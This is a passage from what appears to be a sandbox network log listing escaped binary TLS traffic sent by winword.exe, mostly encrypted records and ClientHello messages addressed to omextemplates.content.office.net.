4g\\x1d9\\xf2q\\x13\\x981\\xa9o\\xc4m\\xb3a\\x89\\x08\\xf3_\\x05\\xe2\\xd8\\x8c\\x7f\\xa1\\xe43fjt\\xf9\\xf4\\x9f\r\\xc4j\\x8a\\xe0\\xe9\\x062\\x06s\\xd6m\\x9f\\x88\\x19@fxl\\xdc\\xe4\\xb33&\\xedgy\\x81\\xbc\\xff\\x1fu\\x82\\xbe\\xcef(\\xa9\\x04\\xe2\\xd0\\xf6\t\\x01\\x82\\xcdj\\xc0`\\xd3^\\xb8\\xc5\\xc4\\xcevq\\x9d\\xc6~\\x19\\x80\\x86s\\xb6\\xc8(\\xf4n\\x0c\\xed\\xc9u\\x8a\\xfe~\\xd9v\\x1bq\\xf5\\xa2\\xc6^\\x9f\\xb9\\x1ex\\xcc\\xc3u\\xec"
403.  
404.  
405. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd3\\xe0t\\\\x85\\x82^\\x9a\\xbd\\x93$\\xa5*\\xdd\\x11\\xf9h\\xa3et\\x03m\r\\xc3\\x9c\\xfd\\xf6\\xca1\\xbb\\x0f\\xfb\\xa6\\xd5\\xba\\xc7\\xf1\\xa5\\xf8\\x9fr&\\xcc\\xb47\\xbf\\xbd\\xec_qhe3\\xc5w\\xbf;\\xd2\\xcbx\\xdey\\xdcrk\\xefzv\\xa1ya\\x847\\x986clw\\xbe\\xe1\\xce\\x06\\x15\\xd8\\x07ku3o\\xc6\\x7f\\x02\\x87f\\xf0\\xba\\x1d\\xf4+\\x86j\\xfb+\\xbe\\xceh\\xd7es6\\xce\\xc8\\x8e\\xf1\\x19\\xda\\x88\\x93\\x12s\\xad\\x81\\x19\\xbb *\r\\x96\\xcbi\\xe0y\\xbas\\xbe\\xcb\\x99\\x8d\\xd7\\x83\\xfe\\x85cy,\\xc6\\xff\\x9f\\xb9!\\xa5^\\x92\\x92\\x1d\\x8fv\\xe4~k\\x10\\x9d\\x84\\x82\\x83\\xc8\\xce\\xc7\\xb9\\x94\\x17\\x1a,\\xf7\\x1e9x\\xff\\x04\\xa4lk\\xee4vd|y\\xae\\xab|\\xe7\\xd1.z\\xf2lhdrp\\x1ao\\x19me\\xa4h'\\xb1\\xee\\x83r\\xa35tp\\xbdk\\xe4\\xcd\\x84s\\xd0\\xfd\\xed!\\xb6\\xa3\\xf7\\x88\\x90|\\x85t\\x8ae1a\\x82|v\\x8d\\x9fu\\xd6"
406.  
407.  
408. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb6\\x1b\\xa5\\xda\\xfa\\x88\\x9b\\xc1hn\\xa7\\xfb\\xb8\\x8b\\x7fx^\\x84\\xc5\\x89\\xd1\\x95\\x1d\\x0e\\xb6%,\\xcf\\x99i\\x116x\\x9a\\xa7\\xbb\\xe4f\\xc7,\\xd9\\xff\n\\xb5\\x94\\xb0\\xc7y\\xccs\\xbe\\xcf\\x94\\xce7\\xc5\\xd4\\xeb\\xfc\\xe7\\x9b\\x05\\xfa\\x89\\xc1\\xae.\\x0bu\\xd1\\x13\\xfd\\xd1\\xfbd\\xac\\x9d\\xeetw\\xcb\\xce\\xff\\xc1\\xb4g\\x89\\xd1/\\xe9\\x98<\\x7f\\xd1\\x85*\\x97\\x8d\\x9a\\x865|,\\x80s\\xdb\\xccm\\x89*zy\\xd3r\\xc5\\xf4\\xa8\\x99\\x9cn\\xff\\xf27\\x0e\\x01\\xa4/\\xd8=k\\xa5\\x1d\\x9dw\\x8f\\xad\\xc5s\\x87\\xa3\\xe8\\xeez\\x86(c\\xc4\\xdfr\\xec\\xb3n.\\x88vo\\xfc\t\\x97\\x919s\\x19qa\\x98\\xb4j\\x9c\\xd4o!zjv\\xba\\x0c\\xa0\\xcd)\\xe8r\\x8f\\xab\\x98\\xc6\\x0bv\\x95zd\\xb4\\xda\\x17\\x16\"n\\x1b\\xdc\\xfbuh\\xd7\\xf1\\xd08i\\x90\\x87a\\xf9j\\xb0\\x13\\x15\\xe0\\xd41o\\xc7\\xbb\\x0f\\xed\\xee\\xaao\\xf9'\\x07k\\x03z\\x9fr\\x88\\xb1\\xb2\\x82\\xeck\\xc1v(\"h\\x86\\xe6"
409.  
410.  
411. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010=\\x9b\\xfe/\\x19\\xbd\\xe6.\\xe2\\x7fr\\xf9\\x81\\xea\\xd6\\x1e\\xab\\xcc\\x81x\\x19\\xfa\\x83x9l\\xc7z\\xa0\\x86\\xef\\xc2\\xfd\\x81mrj\\xadkwy\\xdb\\xcc\\xd7?/\\xfc\\xcfs\\x8a\\x18\\x10e\\xe7\\x8f\"\\x10\\xcf\\xb3\\xa2\\x0c`\\xf0&\\x08'+\\xf1\\xa6\\xe7\\x8f\\xba\\xb0\\xcf\\x0eg\\xf9\\xc8\\x03`d\\xaes\\xea\\x1f\\x16\\xee\\xd2\\x0bf\\xf5pzg7\\xaf\\x15\\xf9\\xb7\\x87v5\\x1f\\xf8t#\\xcb~e\\xb4\\xfc\\x8c\\xf0 s\\xd70\\x10cp\\x15\\x0fb\"t\\xee\\x8fdt\\xcfl\\xcb\\x8d\\x9du\\xad2\\xd0t\\xcd\\xc6\\x03\\x0e7\\xe8\\xfc\\xb7x\\xc2\\x10\\xafr\\x9a\\xbc\\xaew\\x1f\\xd2\\xa3\\xea\\x9e1*\\xc8\\xcf\\xab\\x06@(\\xcf\\xba\\xe2\\xd8\\x83\\xf5\\xfd\\x14\\xb6:\\xef\"\\x8e9d\\xcb\\x14\\xb6\\x92\\x12\\x81\\xff\\x07\\x82\\x95\\xf3tp\\xa8\\xc2bg\\xfch\\x1fsa\\xe7\\xaf\\xee\\xd0\\xbb\\x14.`\"\\xfa\\xa0\\xe5\\xa5\\x00\\xc1\\x8d\\xe2\\xea4p\\7\\xfa\\x95as\r1\\x810c\ny+e\\xea\\xcc\\xee:\\xfa\\xbb\\x12"
412.  
413.  
414. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xfe\\x90\\x86<\\xd6ws'\\xd4\\x19g\\xb87d\\x14\\xc7p\\xe0-kem\\xdf\\xd2<\\x9az\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
415.  
416.  
417. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xb1\\xae\\xff|;\\xa6o\\xd0nem\\\\xa0\\x1d\\xe8/\\xb0\\xcbxt\\x10\\xa4\\xfe\\xdb\\xa1)\\x91\\xa8\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
418.  
419.  
420. "http_request": "winword.exe_WSASend_\\xaa\\x02\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x99y\\x03\\x06\\x9cj\\xc2v\\xbe\\xd6\\x14\\xdb\\x13\\xa0n\\xd3\\xeco84\\x1a\\x17b\\xc0\\x80\\x9f;\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
421.  
422.  
423. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xa4z\\xb1\\x99\\x02cj\\x80\rmy\\xee\\xcf-81b\\xfe\\x86\\xbc\\x86fqt)(n\\x18\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
424.  
425.  
426. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xccrn|\\xc19\\xed\\xf7\\xb6\\x7f3s\\xa9)\\xc8\\xb0\\xa1\\xdf!\\xb4=\\x131d\\xffe\\xd7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
427.  
428.  
429. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\n\\x01i\\xe09\\xfa60l\\xd3l*\\xef(e$\\x9e\\xaa\\xc8\\xd9h\\xe6\\xb0)\\xb7p;\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
430.  
431.  
432. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x88\\xf5\\xb0\\x87q\\xcbl\\x9c\\x1b\\x81t\\xe4\\xf2\\xad\\xa3n7\\x9eo\\xf9\\x9fh\\xd5\\xbd\\x90eo\t\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
433.  
434.  
435. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x8c\\xb1\\x0c\\x18\\xfd\\x7f\\xc8\\x13\\x93\\xdd\\x90\\xd8g\\xf9c\\xb7\\xf8\\x10\\xc9\\xeb\\x8a q\\xcd\\x0c\\xc81(4k\\xd8\\xf4\\xc3\\xb0c\\x96!\\xf1\\xc4\\xbe\\x89\\xa7h<\n\\xb5\\xe7k\\xe5x\\xfc\\x97q\\xaa9\\x16\\xa9`\\xa9\\x94\\xdc\\xa2!\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x036g\\xd1$3\\xe8\\x81\\xb6\\xf1\\x19\\x96\\xb1\\xdd\\xa2\\x89\\xc9\\xa7\\x19\\xd7i@\\x8d\\xdf\\xfc\\x993la\\xaf\\x00\\xc1\\xfe\\xb1\\x0e\\xd2x\r\\xea\\xd5\\xd4c\"\\x83q\\x81\\x9br"
436.  
437.  
438. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xae4v\\x8a\\xb4\\x92z\\x88\\x99\\xae\\xec\\x06ehwt5\\xb7c\"fx\\xdejylk\\xd6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
439.  
440.  
441. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5x\\x91\\xc3l\\xa4\\x0c\\x9b\\x1e\\x7fz\\x9duao\\x98=.\\x08\\x94\\xa0\\xce\\xd4\\x06\\xc1n\\xc7;\\x01\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
442.  
443.  
444. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xa2\\x17t\\x96o\\xae\\xde\\x16\\x06\\xc9\\xd5cu\\xac\\xf7\\xda\\xe7\\xc8,\\xefq\\x1b\\x08u\\xf18\\x95\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
445.  
446.  
447. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5t\\xf1\\x93\\xd8\\xbe)3\\xbc\\x9b\\x02\\xb9\\x03\\x10\\xa7\\x99\\xe8|\\xc8\\x10\\xbf\"o\\xffa\\x95\\xe8\\xfe\\x05\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
448.  
449.  
450. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x1f^\\x91\\xb7\\xda<,\\xb9(i\\xb0\\xc0cr\\x18\\xc6d\\xab\\xb6\\x9e\\xdd\\xdd\\x850\\x8ac_\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
451.  
452.  
453. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5(\\xb3\\\\xed\\xa5h\\x9f\\xd7@x\\x89\\/?3\\x94\\xd1m\\xa8\\xc8\\x04m\\xb5yc\\x87\\xcb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
454.  
455.  
456. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xfb\\xdc\\xab\\xdbh\\xb3\\x94\\x86\\x18\\xe9'\\x91\\xf3p4x\\x17\\x1b6\\x02d\\xc7\\x82gz\\xab\\xa9\\x10\\xf3\\x9f\\xd4\\xe0\\xa2a\\xca\\xf5\\x01\\xa0\\xac\\xec\\xb8\\xde\\x8e\\x98\\xf2b\\xc2\\xa1p\\x80\\xa4\\x93\\xa3\\xfa\\xfc3k\\xac\\xd4\\xe9aw\\x1e\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xeb\\xee\\x123\\x17b2\\x82\\xb2 \\xf7\\xcf\\xa89pwq\\x9a\\x1a\\x0em\\xb8\\xe7x$\\x0b\\x8e\\x1a\\x05\\xbfx\\x0c\\xff\\xf7\n2\\x9d\\xe3\\xf3\\x96\\xect\\x89\\xbe/\\x14"
457.  
458.  
459. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xbb\\x08\\xfed\\x13\\xf1\\xdfx\\x8d\\xc2\\xf4\\xe4rd&:4\\xf75\\xf3\\xdd\\xba\\x80\r\\xe3\\xd6\\x87\\xd4\\x02\\xd1\\x9f%\\xea\\xdb6@\\xcan\\xae\\x16\\xdd\\xf0\\xd7\\xdc\\x82#%\\xd7a\\x94.\\xca\\xf5h\\xd4\\xf4\\x05\\x99#\\xc6\\xea\\x91t\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000z\\x81\\x90\\xf9\\xc7\\xef\\xfds\\xc6\\xe6\\x13\\xb9`lh\\x03\\x10\\xc3\\x84v\\xbb\\x80zv\\xa0x\\x8e\\xb13\\xae\\xb0\\xb7d\\xe9hga\\x95\\x85\\x06l\\xa8`\\xafa\\xaa\\xd4\\xa9"
460.  
461.  
462. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9f\\x15\\x07ygs\\xac\\xe6\\xed\\x9c\\xd7\\x8f\\xf2\\x9d\\x1cp\\xb0\\xf1\\xd4for\\xaem\\x8f\\x98w\\xb0 \\xf1\\x95\\xff\\x1f\\xe22\\xc1\\x9a\\xd4\\xd8\\xbb\\xec\\xc3\\x01\\x8c\\x18\\x99:\\xe5\\x9foh\\x84=\\xa2\\x9e\\xe8\\xbf\\x9a\\xb9n\\x8f\\xda\\xbf\\xf0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000y\\x11'\\x8b\\x90f\\xeb\\x03^i\\xa6s\\xff\\xaah\\xef4:-h\\xfc\\xc6j\n\\xfb\\xb6i\\x04\\xc8\\xca\\xc5\\x9e\\xcb\\xa4\\xc7 &f\\xa0\\x04f\\xb0\\x06ep\\xcaw"
463.  
464.  
465. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04nj\\x1e\\xcc\\x1ej\\x97p-iw\\x05\\xc4\\xc0\\x95\\xeb\\x8c\\xd11\\x90\\x0fx\\xcc3\\x94x\\x00\\x14t7\\xc02\\xde!\\xae\\xbd\\xff\\x0f\\xdb\\xde\\xae+\\xc6\\xe1\\xb4\\xa7b\\xa2\\xf2\\xd6\\xc0k\\xbe\\xd7\\xa8*\\xd8%\\x7f\\xc1*\\x95\\xf2\\x9f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000x\\xb5\\xa9\\x9c\\x17$\\xd5\\xd4\\x8e\\xca<x\\xdfe!\\xa8nr\\xc1\\xb2\\xf2ym;\\x99f\\xc2f\\x82\\x91r\\xab\\xe6\\x05\\xaf\\xfc\\x80tr\\xc2&\\x85\\xfb\\xf9d "
466.  
467.  
468. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x8b\\x84\\xfc\\x0b\"gl\\x1csy\\x7f#\\xcd1\\xc6y\\xd4\\x80\\xf7\\x8f\\x93\\xa4\\xf8)\\x9d\\xf4s1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
469.  
470.  
471. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee51\\xf1\\x86qn\r\\x14x\\xdevpw\\x83\\x9a a\\xad\\x17\\xd8\\xc4r9\\x111\\xf7\\xaae\\xeb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
472.  
473.  
474. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x174\\xaf\\x16\\xb9\\x86\\x11\\x8c\\xfd\\x83\\xd4\\x85u\\xf9\\x93z\\x956\\xe0x\\xe9\\x87v\\xb9\\x03\\xad\n~\\xba\\x1dj\\xc2\\xce\\xd5\\xbbx\\xa0fn\\x08\\xc6\\x92\\xc0\\x11\\xa1\t4\\xd4\\xa2\"-\\xea\"@\\x18\\xbc'\\xf5\\xb9\\xe3\\x12\\x9e\\xf7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000<\\xa5`\\xb4\\x03\\xd0\\xd7\\xed\\x1e0\\xb2\\x1cl\\x14\\xa3_\\x1fb\\x12,o\\x17\\xcc\\xc1ik\\xf4a?\\xe5\\x19x\\xff\\xbb\\x10\\xf7(\\x140\\xda\\x10\\xe9\\x81\\xd4k\\xda\\x00"
475.  
476.  
477. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa9\\xc2ay\\xf9p\\xbeu\\xb2'\\x15`q\\xd6\\xab\\xceq^\\xbe\\xbb\\xce,3\\x9e\\xa1mv\\xb0\\xbc\\xd3\\xd7k\\x0b\\xb7\\x15\\xc2u\\x9fub\\xf6\\xd3\\x16\\xd9.\\xd3\\xc2\\xee\\x1d\\xee\\x1fi\\xa2\\xf1\\xb1yv\\xaf\\x7f\\x98d\\xc4\r\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000i7\\x05gwr\\x88d\\xd1\\x06\\xef\\x057\\xa6e\\x0bq\\x8f\\xe8\\xc6=x\\x98\\xff\\x93\\x8d7*\\x19\\xa2\\xda\\x11h\\xa8\\x05\\xc6y\t\\xc0\\xc0\\x8a af\\xe78\\x18"
478.  
479.  
480. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5 v$\\xee\\xb2\\xed\\xcai\\xaf\\xf9\\x99\\xf1\\x9b\\xd9,\\xa7\\xfe\\x13\\x10\\x0c\\xe3\\xb1\\xael\\xcd:\\xdb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
481.  
482.  
483. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x1e\\x03\\xfez%\\xea\\x14~q\\xe8\\xb7\\xdc\\x84i%e\\x185\\x0e2\\xdc8\\x92\\xe4^p\r\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
484.  
485.  
486. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc5/y:\\x135|vnk\\xb80e\\x81\\xd8\\xa8c=\\xb0\\xcd|i\\xcc\\xc6\\x86\\xb9\\xe4\\xa3\\xd4\to\\xd3?\\xe4\\xbb\\xc2\\x96\\xde\\x1f\\xee\\x94u\\xd3\n\\x9f\\xfa\\xf8\\x079\\xc4\\xcex2\\xa1nq`\\xe6\\xfa%\\x97\\xb9z\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x83\\x1b\\xf5\\x18\\x7f\\xb2\\x89\\x1d\\x8an\\x99\\xd5\\xb5\\x07\\x95\\xc6\\xedo\\x1a`u\\xfd\\xc0\\xbb\\x90)1\\xa5\\xd0\\x80i(u\\x89\\xe1\\xa5h\\xb2\\x03\\xcb\\xe9\\xf6\\xfd\\x86\\"
487.  
488.  
489. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04p\\x8a~\\xa3\\x9c\\xaa\\xfe\\xba\\xb6\t\\xe1\\x19\\xe6\\xa8b\\x8c\\xc6\\xb2\\xe9\\xfe\\xa0\\xfb\\x159\\xc8 \\x93=\\x99\\xb5\\xcd\\xe3\\xa2\\x81g\\x10r\\xd9\\x195\\x96\\x9e\\x12\\xbb\\x12\\xf7\\x04\\xa0\\xc5\\xee\\x9c\\x9e\\x86 \\x0fg\\x88\\xe1\\x0f b\\xe9\\xb2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbfirn\\xa6\\x93y\\xb6\\xbb\\xa4\\xa1\\xd8\\x89ou\\xfbt\\xc7\\x9b_\\x0c\\xcdm1mu\\xa3\\x82\\x94 k\\x8f\\xd8\\xda\\xd0 \\xdc\\xc2jh\\x05|c/f\to"
490.  
491.  
492. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x82\\x8fx\\x17/\\xfc\\xcc7\\x90\\x0c#d\\x8b\\xdb\\xdefl\\xdb\\xf4;n\\xce\\x96\\x05m\\xe2\\x83\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
493.  
494.  
495. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x02\\xfdr\\xb4\\xa6\\x9d\\xcd\\xddq\\x81g\\x1f\\xd4\\xd3)\\xa2\\xb9\\x94\\xd6\\xef~\\x0f\\xc6fb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
496.  
497.  
